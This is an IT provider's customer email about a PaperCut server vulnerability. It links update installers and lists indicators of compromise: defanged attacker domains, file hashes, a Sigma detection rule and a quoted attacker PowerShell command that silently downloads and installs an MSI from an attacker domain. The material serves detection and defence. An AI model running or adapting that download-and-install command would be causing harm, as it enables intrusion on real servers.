<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office"><head>
<!--[if gte mso 15]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>PaperCut Vulnerability</title>
<style>          img{-ms-interpolation-mode:bicubic;}
          table, td{mso-table-lspace:0pt; mso-table-rspace:0pt;}
          .mceStandardButton, .mceStandardButton td, .mceStandardButton td a{mso-hide:all !important;}
          p, a, li, td, blockquote{mso-line-height-rule:exactly;}
          p, a, li, td, body, table, blockquote{-ms-text-size-adjust:100%; -webkit-text-size-adjust:100%;}
          @media only screen and (max-width: 480px){
            body, table, td, p, a, li, blockquote{-webkit-text-size-adjust:none !important;}
          }
          .mcnPreviewText{display: none !important;}
          .bodyCell{margin:0 auto; padding:0; width:100%;}
          .ExternalClass, .ExternalClass p, .ExternalClass td, .ExternalClass div, .ExternalClass span, .ExternalClass font{line-height:100%;}
          .ReadMsgBody{width:100%;} .ExternalClass{width:100%;}
          a[x-apple-data-detectors]{color:inherit !important; text-decoration:none !important; font-size:inherit !important; font-family:inherit !important; font-weight:inherit !important; line-height:inherit !important;}
            body{height:100%; margin:0; padding:0; width:100%; background: #ffffff;}
            p{margin:0; padding:0;}
            table{border-collapse:collapse;}
            td, p, a{word-break:break-word;}
            h1, h2, h3, h4, h5, h6{display:block; margin:0; padding:0;}
            img, a img{border:0; height:auto; outline:none; text-decoration:none;}
            a[href^="tel"], a[href^="sms"]{color:inherit; cursor:default; text-decoration:none;}
            li p {margin: 0 !important;}
            .ProseMirror a {
                pointer-events: none;
            }
            @media only screen and (max-width: 480px){
                body{width:100% !important; min-width:100% !important; }
                body.mobile-native {
                    -webkit-user-select: none; user-select: none; transition: transform 0.2s ease-in; transform-origin: top center;
                }
                body.mobile-native.selection-allowed a, body.mobile-native.selection-allowed .ProseMirror {
                    user-select: auto;
                    -webkit-user-select: auto;
                }
                colgroup{display: none;}
                img{height: auto !important;}
                .mceWidthContainer{max-width: 660px !important;}
                .mceColumn{display: block !important; width: 100% !important;}
                .mceColumn-forceSpan{display: table-cell !important; width: auto !important;}
                .mceBlockContainer{padding-right:16px !important; padding-left:16px !important;}
                .mceSpacing-24{padding-right:16px !important; padding-left:16px !important;}
                .mceFooterSection .mceText, .mceFooterSection .mceText p{font-size: 16px !important; line-height: 140% !important;}
                .mceText, .mceText p{font-size: 16px !important; line-height: 140% !important;}
                h1{font-size: 30px !important; line-height: 120% !important;}
                h2{font-size: 26px !important; line-height: 120% !important;}
                h3{font-size: 20px !important; line-height: 125% !important;}
                h4{font-size: 18px !important; line-height: 125% !important;}
                .ProseMirror {
                    -webkit-user-modify: read-write-plaintext-only;
                    user-modify: read-write-plaintext-only;
                }
            }
            @media only screen and (max-width: 640px){
                .mceClusterLayout td{padding: 4px !important;}
            }
            div[contenteditable="true"] {outline: 0;}
            .ProseMirror .empty-node, .ProseMirror:empty {position: relative;}
            .ProseMirror .empty-node::before, .ProseMirror:empty::before {
                position: absolute;
                left: 0;
                right: 0;
                color: rgba(0,0,0,0.2);
                cursor: text;
            }
            .ProseMirror .empty-node:hover::before, .ProseMirror:empty:hover::before {
                color: rgba(0,0,0,0.3);
            }
            .ProseMirror h1.empty-node::before {
                content: 'Heading';
            }
            .ProseMirror p.empty-node:only-child::before, .ProseMirror:empty::before {
                content: 'Start typing...';
            }
            a .ProseMirror p.empty-node::before, a .ProseMirror:empty::before {
                content: '';
            }
            .mceText, .ProseMirror {
                    white-space: pre-wrap;
                }
body, #bodyTable { background-color: rgb(244, 244, 244); }.mceText, .mceLabel { font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif; }.mceText, .mceLabel { color: rgb(0, 0, 0); }.mceText p { margin-bottom: 0px; }.mceText label { margin-bottom: 0px; }.mceText input { margin-bottom: 0px; }.mceSpacing-12 .mceInput + .mceErrorMessage { margin-top: -6px; }.mceText p { margin-bottom: 0px; }.mceText label { margin-bottom: 0px; }.mceText input { margin-bottom: 0px; }.mceSpacing-24 .mceInput + .mceErrorMessage { margin-top: -12px; }.mceInput { background-color: transparent; border: 2px solid rgb(208, 208, 208); width: 60%; color: rgb(77, 77, 77); display: block; }.mceInput[type="radio"], .mceInput[type="checkbox"] { float: left; margin-right: 12px; display: inline; width: auto !important; }.mceLabel > .mceInput { margin-bottom: 0px; margin-top: 2px; }.mceLabel { display: block; }.mceText p { color: rgb(0, 0, 0); font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.5; text-align: left; letter-spacing: 0px; direction: ltr; }.mceText a { color: rgb(0, 0, 0); font-style: normal; font-weight: normal; text-decoration: underline; direction: ltr; }
@media only screen and (max-width: 480px) {
            .mceText p { font-size: 16px !important; line-height: 1.5 !important; }
          }
@media only screen and (max-width: 480px) {
            .mceBlockContainer { padding-left: 16px !important; padding-right: 16px !important; }
          }
#dataBlockId-9 p, #dataBlockId-9 h1, #dataBlockId-9 h2, #dataBlockId-9 h3, #dataBlockId-9 h4, #dataBlockId-9 ul { text-align: center; }#dataBlockId-1 p, #dataBlockId-1 h1, #dataBlockId-1 h2, #dataBlockId-1 h3, #dataBlockId-1 h4, #dataBlockId-1 ul { text-align: center; }</style></head>
<body>
<center>
<table border="0" cellpadding="0" cellspacing="0" height="100%" width="100%" id="bodyTable" style="background-color: rgb(244, 244, 244);">
<tbody><tr>
<td class="bodyCell" align="center" valign="top">
<table id="root" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody data-block-id="13" class="mceWrapper"><tr><td align="center" valign="top" class="mceWrapperOuter"><!--[if (gte mso 9)|(IE)]><table align="center" border="0" cellspacing="0" cellpadding="0" width="660" style="width:660px;"><tr><td><![endif]--><table border="0" cellpadding="0" cellspacing="0" width="100%" style="max-width:660px" role="presentation"><tbody><tr><td style="background-color:#ffffff;background-position:center;background-repeat:no-repeat;background-size:cover" class="mceWrapperInner" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation" data-block-id="12"><tbody><tr class="mceRow"><td style="background-position:center;background-repeat:no-repeat;background-size:cover" valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation"><tbody><tr><td style="padding-top:0;padding-bottom:0" class="mceColumn" data-block-id="-4" valign="top" colspan="12" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation"><tbody><tr><td style="padding-top:48px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="1" class="mceText" id="dataBlockId-1" style="width:100%"><p class="last-child"><a href="https://mailchi.mp/d73ed47aa324/papercut-vulnerability?e=8bbedbdd28">View this email in your browser</a></p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="19" class="mceText" id="dataBlockId-19" style="width:100%"><p>Dear Valued TBS Customer,</p><p><br /></p><p>We have been made aware of a vulnerability within PaperCut. This vulnerability affects all PaperCut servers through port 9191. 
Servers that have port 9191 exposed to the outside world are <strong>EXTREMELY</strong> vulnerable.</p><p><br /></p><p class="last-child">We wanted to share the attached documents with you: one from PaperCut, and an article that provides useful insight into this issue.</p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" align="center" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" data-block-id="5"><tbody><tr class="mceStandardButton"><td style="background-color:#16215e;border-radius:8px;text-align:center" class="mceButton" valign="top"><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=8ea6aed4f4&e=8bbedbdd28" target="_blank" style="background-color:#16215e;border-radius:8px;border:3px solid #16215e;color:#ffffff;display:block;font-family:'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;font-size:16px;font-weight:normal;font-style:normal;padding:16px 28px;text-decoration:none;min-width:30px;text-align:center;direction:ltr;letter-spacing:0px">Download Articles PDF </a></td></tr><tr>
<!--[if mso]>
<td align="center">
<v:roundrect xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:w="urn:schemas-microsoft-com:office:word"
href="https://mcusercontent.com/bf77172ea6b10a18f6669778a/files/3a9f97a6-fa72-482d-c96e-4fd808de1f97/Papercut_Article.01.pdf"
style="v-text-anchor:middle; width:228.86px; height:55.2px;"
arcsize="3%"
strokecolor="#16215e"
strokeweight="3px"
fillcolor="#16215e">
<v:stroke dashstyle="solid"/>
<w:anchorlock />
<center style="
color: #ffffff;
display: block;
font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;
font-size: 16;
font-style: normal;
font-weight: normal;
letter-spacing: 0px;
text-decoration: none;
text-align: center;
direction: ltr;"
>
Download Articles PDF
</center>
</v:roundrect>
</td>
<![endif]-->
</tr></tbody></table></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="20" class="mceText" id="dataBlockId-20" style="width:100%"><p>Please contact our support team to schedule the update. Anyone running PaperCut Version 19 or prior is required to contact our support team.</p><p><br /></p><p>To email: <a href="mailto:helpdesk@tbsit360.com?subject=PaperCut%20Vulnerabilty&body=null">Helpdesk@tbsit360.com</a>  or call us (630) 537-1370 ext. 2</p><p><br /></p><p class="last-child">The links below from PaperCut are for anyone who would like to perform the update themselves.</p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="18" class="mceText" id="dataBlockId-18" style="width:100%"><p><br /></p><p><span style="font-size: 16px">Links to Download:</span></p><p><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px">PaperCut Version 22</span></p><p><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=bbd917d6d3&e=8bbedbdd28"><span style="font-size: 16px">https://cdn.papercut.com/web/products/ng-mf/installers/mf/22.x/pcmf-setup-22.0.10.65997.exe</span></a></p><p><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px">PaperCut Version 21:</span></p><p><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=ef667c7098&e=8bbedbdd28"><span style="font-size: 16px">https://cdn.papercut.com/web/products/ng-mf/installers/mf/21.x/pcmf-setup-21.2.11.65657.exe</span></a></p><p><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px">PaperCut Version 20:</span></p><p><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=18b432a76b&e=8bbedbdd28"><span style="font-size: 
16px">https://cdn.papercut.com/web/products/ng-mf/installers/mf/20.x/pcmf-setup-20.1.7.65660.exe</span></a><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px"> </span></p><p><em><strong><span style="color:#fc0d0d;">Anyone running PaperCut Version 19 or prior is required to contact our support team.</span></strong></em></p><p><br /></p><p class="last-child"><em><strong><span style="color:#fc0d0d;"><span style="font-size: 16px">IMPORTANT: Make sure to back up your PaperCut database before performing any of the installations above.</span></span></strong></em></p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="17" class="mceText" id="dataBlockId-17" style="width:100%"><p style="text-align: center;"><em><strong><span style="font-size: 19px">How do I know if my server has been exploited?</span></strong></em></p><p><br /></p><p>We currently recommend looking for the following Indicators of Compromise to determine if it is likely that the vulnerability has been used to install malware on the system. 
Depending on your systems, logging, and endpoint protection software, you may be able to detect the following.</p><p><br /></p><p>•        If your security software has raised any alerts or warnings</p><p>•       If you see suspicious PaperCut MF application log entries, e.g.:</p><p>•    User “admin” logs into the administration interface</p><p>•   Admin user “admin” modified the print script on the printer</p><p>•   User “admin” updated the config key “…”</p><p>• User “[setup-wizard]” modified a config key</p><p>•   Domains in DNS or web proxy logs:</p><p>• upd488[.]windowservicecemter[.]com/download/ld.txt</p><p>•        upd488[.]windowservicecemter[.]com/download/AppPrint.msi</p><p>•  upd488[.]windowservicecemter[.]com/download/a2.msi</p><p>•        upd488[.]windowservicecemter[.]com/download/a3.msi</p><p>•        anydeskupdate[.]com</p><p>•       anydeskupdates[.]com</p><p>•      netviewremote[.]com</p><p>•       updateservicecenter[.]com</p><p>• windowcsupdates[.]com</p><p>•     windowservicecentar[.]com</p><p>• windowservicecenter[.]com</p><p>• winserverupdates[.]com</p><p>•    SHA256 hashes of files on local system:</p><p>•   setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb</p><p>•        ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125</p><p>•   PowerShell scripts with content similar to:</p><p>```</p><p>cmd /c “powershell.exe -nop -w hidden</p><p>Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’</p><p>-OutFile ‘setup.msi’ ”</p><p>cmd /c “msiexec /i setup.msi /qn  IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1”\\@@</p><p>```</p><p>• Detection via Sigma rule on SIEM:</p><p>```</p><p>title: PaperCut MF/NG Vulnerability </p><p> authors: Huntress DE&TH Team </p><p> description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG </p><p> logsource: </p><p> category: process_creation </p><p> product: windows </p><p> detection: </p><p> selection: </p><p> 
ParentImage|endswith: \\pc-app.exe </p><p> Image|endswith:  </p><p> - \\cmd.exe </p><p> - \\powershell.exe </p><p> condition: selection </p><p> level: high </p><p> falsepositives: </p><p> - Expected admin activity </p><p>```</p><p class="last-child">If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior.</p></div></td></tr><tr><td style="background-color:transparent;padding-top:20px;padding-bottom:20px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%" style="background-color:transparent" role="presentation" data-block-id="16"><tbody><tr><td style="min-width:100%;border-top:2px solid #000000" valign="top"></td></tr></tbody></table></td></tr><tr><td style="background-color:transparent;padding-top:20px;padding-bottom:20px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%" style="background-color:transparent" role="presentation" data-block-id="6"><tbody><tr><td style="min-width:100%;border-top:2px solid #000000" valign="top"></td></tr></tbody></table></td></tr><tr><td style="padding-top:8px;padding-bottom:8px;padding-right:8px;padding-left:8px" class="mceLayoutContainer" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation" data-block-id="11" id="section_0083ac4a9e7811ea40ce72d56ebb0410" class="mceFooterSection"><tbody><tr class="mceRow"><td style="background-position:center;background-repeat:no-repeat;background-size:cover" valign="top"><table border="0" cellpadding="0" cellspacing="12" width="100%" role="presentation"><tbody><tr><td style="padding-top:0;padding-bottom:0;margin-bottom:12px" class="mceColumn" 
data-block-id="-3" valign="top" colspan="12" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation"><tbody><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:48px;padding-left:48px" class="mceBlockContainer" align="center" valign="top"><img data-block-id="8" width="130" style="width:130px;height:auto;max-width:100%;display:block" alt="Logo" src="https://dim.mcusercontent.com/cs/bf77172ea6b10a18f6669778a/images/4d8c69b8-2f3f-e7b4-e767-d2d7551a418a.png?w=130&dpr=2" class="" /></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" align="center" valign="top"><div data-block-id="9" class="mceText" id="dataBlockId-9" style="display:inline-block;width:100%"><p class="last-child"><em><span style="font-size: 12px">Copyright (C) 2023 TBS - Today's Business Solutions. All rights reserved.</span></em><br /><span style="font-size: 12px">
</span><br /><br /><span style="font-size: 12px">Want to change how you receive these emails?</span><br /><span style="font-size: 12px">You can </span><a href="https://tbsit360.us14.list-manage.com/profile?u=bf77172ea6b10a18f6669778a&id=1c9cbcf45e&e=8bbedbdd28&c=a6bd7e6788"><span style="font-size: 12px">update your preferences</span></a><span style="font-size: 12px"> or </span><a href="https://tbsit360.us14.list-manage.com/unsubscribe?u=bf77172ea6b10a18f6669778a&id=1c9cbcf45e&e=8bbedbdd28&c=a6bd7e6788"><span style="font-size: 12px">unsubscribe</span></a></p></div></td></tr><tr><td class="mceLayoutContainer" align="center" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation" data-block-id="-2"><tbody><tr class="mceRow"><td style="background-position:center;background-repeat:no-repeat;background-size:cover;padding-top:0px;padding-bottom:0px" valign="top"><table border="0" cellpadding="0" cellspacing="24" width="100%" role="presentation"><tbody></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr></tbody></table>
</td>
</tr>
</tbody></table>
</center>
</body></html>